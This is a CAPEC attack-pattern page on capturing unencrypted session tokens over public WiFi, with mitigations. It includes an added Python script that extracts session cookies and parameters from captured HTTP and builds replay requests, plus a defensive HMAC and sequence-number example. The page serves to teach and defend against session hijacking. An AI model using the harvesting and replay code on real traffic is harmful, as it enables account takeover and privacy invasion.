The attacker sniffs on the wireless network to
detect unencrypted traffic that contains session
tokens.
Attack Step Techniques
ID  Attack Step Technique Description  Environments
1   The attacker uses a network sniffer tool such as Ferret or Hamster to
    monitor the wireless traffic at a WiFi hotspot, examining it for evidence
    that session tokens are being transmitted in unencrypted or otherwise
    recognizable form. The attacker applies knowledge of how session tokens
    are generated and transmitted by various target systems (cookie names,
    URL parameters, token formats) to pick them out of the traffic.  env-Web
Indicators
ID  type      Indicator Description  Environments
1   Positive  The attacker and the victim are both on the same WiFi network.  env-Web, env-ClientServer
2   Positive  Traffic between the victim and the targeted application is unencrypted.  env-Web, env-ClientServer
Outcomes
ID  type     Outcome Description
1   Success  The attacker sees session tokens in the unencrypted traffic.
Experiment
Capture session token: The attacker uses sniffing tools to capture a session
token from traffic.
Insert captured session token: The attacker attempts to insert a captured
session token into communication with the targeted application to confirm
its viability for exploitation.
Exploit
Session Token Exploitation: The attacker leverages the captured session token
to interact with the targeted application in a malicious fashion,
impersonating the victim.
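The capture and insertion steps above, as an added example that is not CAPEC's own code: it parses constructed plaintext HTTP requests (the hostnames mail.example.test, portal.example.test, cdn.example.test and the cookie values are invented for the example), picks out session tokens using a small table of cookie and parameter names that common platforms use, and builds the request an attacker would send to reuse a captured token. The name table, the TokenSighting type and the helper functions are assumptions of the example, not part of any tool the page names.

```python
"""Added example (not CAPEC's own code): pull session tokens out of captured
plaintext HTTP requests and build the request an attacker would send to reuse
one.  Hostnames, cookie values and the captured traffic are all constructed."""
import re
from dataclasses import dataclass

# Cookie and parameter names that common platforms use for the session id.
# Illustrative, not exhaustive: this is the "knowledge of how target systems
# transmit session tokens" that the attack step relies on.
KNOWN_SESSION_NAMES = {
    "phpsessid", "jsessionid", "asp.net_sessionid", "sessionid",
    "session_id", "sid", "connect.sid", "session",
}


@dataclass(frozen=True)
class TokenSighting:
    host: str
    name: str
    value: str
    where: str  # "cookie", "path" or "query"


def _looks_like_token(value: str) -> bool:
    # Real session ids are long and opaque; skip short or structured values.
    return len(value) >= 16 and re.fullmatch(r"[A-Za-z0-9%._~-]+", value) is not None


def extract_session_tokens(raw_request: bytes) -> list:
    """Return every session token found in one plaintext HTTP request."""
    head = raw_request.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    request_line = lines[0].split(" ")
    if len(request_line) != 3:
        return []
    target = request_line[1]
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    host = headers.get("host", "")
    found = []
    # 1. Cookie header, the usual carrier for web session ids.
    for pair in headers.get("cookie", "").split(";"):
        if "=" in pair:
            name, value = pair.strip().split("=", 1)
            if name.lower() in KNOWN_SESSION_NAMES and _looks_like_token(value):
                found.append(TokenSighting(host, name, value, "cookie"))
    # 2. Servlet containers may carry the id as a path parameter: /app;jsessionid=...
    match = re.search(r";jsessionid=([^?;/ ]+)", target, re.IGNORECASE)
    if match:
        found.append(TokenSighting(host, "jsessionid", match.group(1), "path"))
    # 3. Query string, e.g. PHP with cookies disabled (?PHPSESSID=...).
    if "?" in target:
        for pair in target.split("?", 1)[1].split("&"):
            if "=" in pair:
                name, value = pair.split("=", 1)
                if name.lower() in KNOWN_SESSION_NAMES and _looks_like_token(value):
                    found.append(TokenSighting(host, name, value, "query"))
    return found


def unique_tokens(captured) -> list:
    """Deduplicate sightings across a capture (an AJAX client repeats the same token)."""
    seen, result = set(), []
    for raw in captured:
        for s in extract_session_tokens(raw):
            key = (s.host, s.name, s.value)
            if key not in seen:
                seen.add(key)
                result.append(s)
    return result


def build_replay_request(sighting: TokenSighting, path: str = "/") -> bytes:
    """The 'insert captured session token' step: a fresh request that reuses the token."""
    if sighting.where == "path":
        path = f"{path};{sighting.name}={sighting.value}"
        cookie = b""
    elif sighting.where == "query":
        path = f"{path}?{sighting.name}={sighting.value}"
        cookie = b""
    else:
        cookie = f"Cookie: {sighting.name}={sighting.value}\r\n".encode()
    return (f"GET {path} HTTP/1.1\r\nHost: {sighting.host}\r\n".encode()
            + cookie + b"Connection: close\r\n\r\n")


# Constructed capture: what an attacker at the hotspot would see on the wire.
CAPTURED = [
    b"GET /mail/inbox HTTP/1.1\r\nHost: mail.example.test\r\n"
    b"Cookie: PHPSESSID=8f3a1c9e2b7d4a6f0c1e5d9b3a7f2c4e; theme=dark\r\n\r\n",
    # The AJAX "ring home" request repeats the token every few seconds.
    b"POST /mail/sync HTTP/1.1\r\nHost: mail.example.test\r\n"
    b"X-Requested-With: XMLHttpRequest\r\n"
    b"Cookie: PHPSESSID=8f3a1c9e2b7d4a6f0c1e5d9b3a7f2c4e\r\n"
    b"Content-Length: 2\r\n\r\n{}",
    b"GET /portal/home;jsessionid=0A1B2C3D4E5F60718293A4B5C6D7E8F9 HTTP/1.1\r\n"
    b"Host: portal.example.test\r\n\r\n",
    b"GET /static/logo.png HTTP/1.1\r\nHost: cdn.example.test\r\n\r\n",
]

if __name__ == "__main__":
    for s in unique_tokens(CAPTURED):
        print(f"{s.host}: {s.name}={s.value} ({s.where})")
        print(build_replay_request(s, "/mail/inbox").decode())
```

Run on the constructed capture, the sweep yields two distinct tokens (the PHP cookie repeated by the AJAX client is reported once, the servlet path parameter once) and the image fetch yields nothing. In a real capture the raw requests would come from a pcap or a live sniffer; everything else in the flow, including the replayed request, is the same. Note that step 3 here matches a token regardless of whether the application actually uses it, so a real tool would confirm each candidate by the insertion step before relying on it.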
Security Controls
ID  type          Security Control Description
1   Preventative  Utilize end-to-end encrypted communication via a secure
                  tunneling protocol between the victim and the target system.
Attack Prerequisites
An attacker and the victim are both using the same WiFi network.
The victim has an active session with a target system.
The victim is not using a secure channel (e.g. SSL/TLS, VPN) to communicate
with the target system.
The victim initiated communication with a target system that requires
transfer of the session token, or the target application uses AJAX and
thereby periodically "rings home" asynchronously, sending the session token
with each request.
Typical Likelihood of Exploit
Likelihood: High
Methods of Attack
Time and State
Analysis
Spoofing
Protocol Manipulation
Examples-Instances
Description
The attacker and the victim are using the same public WiFi hotspot. When the
victim connects to the hotspot, he has a hosted e-mail account open. This
e-mail application uses AJAX on the client side, which periodically and
asynchronously connects to the server side and transfers, amongst other
things, the user's session token. The communication is supposed to happen
over HTTPS. However, the hotspot's configuration initially blocks the HTTPS
connection (and every other connection) between the victim and the hosted
e-mail servers, because the victim first has to register with the hotspot.
The victim does so, but the e-mail client has already fallen back to a
connection without HTTPS, since the HTTPS connection was denied the first
time. The victim's session token is now flowing unencrypted between the
victim's browser and the hosted e-mail servers. The attacker leverages this
opportunity to capture the session token and gain access to the victim's
hosted e-mail account.
Attacker Skills or Knowledge Required
Skill or Knowledge Level: Low
Easy to use tools exist to automate this attack.
Resources Required
Low: A laptop and access to a public WiFi network.
Probing Techniques
Use available tools to snoop on communications between the victim and the
target system and try to capture the transmitted session token
Use the captured session token to impersonate the victim on the target
system to perform actions and view information on their behalf.
Solutions and Mitigations
Make sure that HTTPS is used for all communication with the target system,
and mark the session cookie with the Secure attribute so that the browser
never sends it over a plaintext connection. Alternatively, use a VPN if
possible. It is important to ensure that all communication between the
client and the server happens via an encrypted secure channel: a single
request that falls back to plaintext is enough to expose the token.
Modify the session token with each transmission and protect it with
cryptography. Add request sequencing so that the server can detect replay
attacks.
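The second mitigation, a per-transmission token plus request sequencing, as an added example that is not CAPEC's own code. The token sent with each request is an HMAC over a sequence number and the request itself, so it changes every time and the server rejects any sequence number it has already accepted. SequencedSession, sign_request, verify_request, the per-session secret and the sample requests are all constructed for the example.

```python
"""Added example (not CAPEC's own code): a per-request token bound to a sequence
number, so a request sniffed off the air cannot be replayed and the token
changes on every transmission.  Session secret and requests are constructed."""
import hashlib
import hmac
import secrets


class SequencedSession:
    """Server-side record: the per-session secret and the last sequence accepted.
    The secret must never cross the wire in the clear (e.g. issue it during a
    TLS-protected login); an attacker who sniffs it can compute valid MACs."""

    def __init__(self, secret: bytes):
        self.secret = secret
        self.last_seq = 0


def sign_request(secret: bytes, seq: int, method: str, path: str, body: bytes) -> str:
    """Client side: the transmitted token is an HMAC over seq + request, so it
    differs for every request and is useless for any other request or seq."""
    msg = b"%d\n%s\n%s\n%s" % (seq, method.encode(), path.encode(), body)
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def verify_request(session: SequencedSession, seq: int, token: str,
                   method: str, path: str, body: bytes) -> bool:
    """Server side: reject anything with a stale sequence number or a bad MAC."""
    if seq <= session.last_seq:
        return False            # replay: this sequence number was already accepted
    expected = sign_request(session.secret, seq, method, path, body)
    if not hmac.compare_digest(expected, token):
        return False            # tampered request or wrong secret; do not advance seq
    session.last_seq = seq
    return True


def demo() -> dict:
    """Walk through legitimate traffic, a sniffed-and-replayed request and a forgery."""
    secret = secrets.token_bytes(32)        # constructed: issued at (TLS-protected) login
    server = SequencedSession(secret)
    results = {}

    # Two legitimate requests from the victim's client.
    t1 = sign_request(secret, 1, "GET", "/mail/inbox", b"")
    results["first"] = verify_request(server, 1, t1, "GET", "/mail/inbox", b"")
    t2 = sign_request(secret, 2, "POST", "/mail/sync", b"{}")
    results["second"] = verify_request(server, 2, t2, "POST", "/mail/sync", b"{}")

    # Attacker sniffed request 2 and replays it verbatim: stale sequence number.
    results["replayed"] = verify_request(server, 2, t2, "POST", "/mail/sync", b"{}")

    # Attacker bumps the sequence number and changes the request, keeping the
    # sniffed token: the MAC no longer matches because the attacker lacks the secret.
    results["forged"] = verify_request(server, 3, t2, "POST", "/mail/send", b"{...}")

    # The victim's next real request still goes through.
    t3 = sign_request(secret, 3, "GET", "/mail/inbox", b"")
    results["third"] = verify_request(server, 3, t3, "GET", "/mail/inbox", b"")
    return results


if __name__ == "__main__":
    print(demo())
```

This raises the bar against replay of a sniffed request; it does not replace the first mitigation, since without an encrypted channel the rest of the request, including the mail contents in the constructed scenario, is still readable on the air, and the per-session secret itself has to be delivered over a protected channel or the scheme collapses.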
Vision and Technical Leadership provided by Cigital, Inc.
This Web site is hosted by The MITRE Corporation.
Copyright 2009, The MITRE Corporation. CAPEC and the CAPEC logo are trademarks of The MITRE Corporation.